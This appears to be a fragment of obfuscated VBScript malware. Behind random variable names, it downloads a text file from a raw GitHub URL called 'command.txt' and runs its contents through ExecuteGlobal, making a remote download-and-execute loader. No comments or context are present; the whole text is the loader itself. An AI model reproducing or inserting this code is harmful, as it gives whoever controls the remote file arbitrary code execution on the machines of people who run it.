miOrEKvWqwEhHwIUZLXrYLNKFfTjkvASMQRvgHgVdCvNBywkmO = "https://raw.githubusercontent.com/freelancertool/data/master/command.txt"
Set RdvUqpANVIFRYhgsapYSkIcuPIBcHvXlEkPJnUafyFfQQYGcWQ = CreateObject("MSXML2.ServerXMLHTTP")
RdvUqpANVIFRYhgsapYSkIcuPIBcHvXlEkPJnUafyFfQQYGcWQ.Open "GET", miOrEKvWqwEhHwIUZLXrYLNKFfTjkvASMQRvgHgVdCvNBywkmO, False
RdvUqpANVIFRYhgsapYSkIcuPIBcHvXlEkPJnUafyFfQQYGcWQ.Send
arhHjdAqCAqAxPSxkCkoGSUwtKNeuYNZrTuXSjQvFiCevUVWJk = RdvUqpANVIFRYhgsapYSkIcuPIBcHvXlEkPJnUafyFfQQYGcWQ.responseText
ExecuteGlobal arhHjdAqCAqAxPSxkCkoGSUwtKNeuYNZrTuXSjQvFiCevUVWJk
